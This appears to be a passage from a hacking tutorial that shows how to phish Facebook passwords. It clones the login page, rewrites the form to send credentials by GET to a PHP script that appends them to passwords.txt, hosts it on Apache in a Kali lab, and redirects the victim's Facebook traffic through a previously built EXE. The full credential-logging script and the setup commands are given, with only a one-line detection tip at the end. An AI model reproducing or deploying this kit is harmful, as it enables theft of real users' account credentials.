Password Phishing can result in huge loss of identity and user’s confidential details. This could result in financial losses for users and can also prevent them from accessing their own accounts.
In this article, we will see how an attacker can take advantage of manipulating the DNS record for Facebook, redirect traffic to the phishing page, and grab the account password.
Facebook password phishing
Here, we will see how an attacker can take advantage of manipulating the DNS record for Facebook, redirect traffic to the phishing page, and grab the account password.
First, we need to set up a phishing page.
You need not be an expert in web programming. You can easily Google the steps for preparing a phishing account.
- To create a phishing page, first open your browser and navigate to the Facebook login page. Then, on the browser menu, click on File and then on Save page as…. Then, make sure that you choose a complete page from the drop-down menu.
- The output should be an .html file.
- Now let’s extract some data here. Open the Phishing folder from the code files provided with this book. Rename the Facebook HTML page index.html.
- Inside this HTML, we have to change the login form. If you search for action=, you will see it. Here, we change the login form to redirect the request into a custom PHP page called login.php. Also, we have to change the request method to GET instead of POST.
- You will see that I have added a login.php page in the same Phishing directory. If you open the file, you will find the following script:
<?php header("Location: http://www.facebook.com/home.php? "); $handle = fopen("passwords.txt", "a"); foreach($_GET as $variable => $value) fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "rn"); fwrite($handle, "rn"); fclose($handle); exit; ?>
As soon as our target clicks on the Log In button, we will send the data as a GET request to this login.php and we will store the submitted data in our passwords.txt file; then, we will close it.
- Next, we will create the passwords.txt file, where the target credentials will be stored.
- Now, we will copy all of these files into varwww and start the Apache services.
- If we open the index.html page locally, we will see that this is the phishing page that the target will see.
Let’s recap really quickly what will happen when the target clicks on the Log In button? As soon as our target clicks on the Log In button, the target’s credentials will be sent as GET requests to login.php. Remember that this will happen because we have modified the action parameter to send the credentials to login.php. After that, the login.php will eventually store the data into the passwords.txt file.
Now, before we start the Apache services, let me make sure that we get an IP address.
- Enter the following command:
ifconfig eth0
You can see that we are running on 10.10.10.100 and we will also start the Apache service using:
service apache2 start
- Let’s verify that we are listening on port 80, and the service that is listening is Apache:
netstat -antp | grep "80"
Now, let’s jump to the target side for a second.
In our previous section, we have used google.jo in our script. Here, we have already modified our previous script to redirect the Facebook traffic to our attacker machine. So, all our target has to do is double-click on the EXE file. Now, to verify:
- Let us start Wireshark and then start the capture.
- We will filter on the attacker IP, which is 10.10.10.100:
- Open the browser and navigate to https://www.facebook.com/:
Once we do this, we’re taken to the phishing page instead. Here, you will see the destination IP, which is the Kali IP address. So, on the target side, once we are viewing or hitting https://www.facebook.com/, we are basically viewing index.html, which is set up on the Kali machine. Once the victim clicks on the login page, we will send the data as a GET request to login.php, and we will store it into passwords.txt, which is currently empty.
- Now, log into your Facebook account using your username and password. and jump on the Kali side and see if we get anything on the passwords.txt file. You can see it is still empty. This is because, by default, we have no permission to write data. Now, to fix this, we will give all files full privilege, that is, to read, write, and execute:
chmod -R 777 /var/www/
Note that we made this, since we are running in a VirtualBox environment. If you have a web server exposed to the public, it’s bad practice to give full permission to all of your files due to privilege escalation attacks, as an attacker may upload a malicious file or manipulate the files and then browse to the file location to execute a command on his own.
- Now, after giving the permission, we will stop and start the Apache server just in case:
service apache2 stop service apache2 start
- After doing this modification, go to the target machine and try to log into Facebook one more time. Then, go to Kali and click on passwords.txt. You will see the submitted data from the target side, and we can see the username and the password.
In the end, a good sign for a phishing activity is missing the https sign.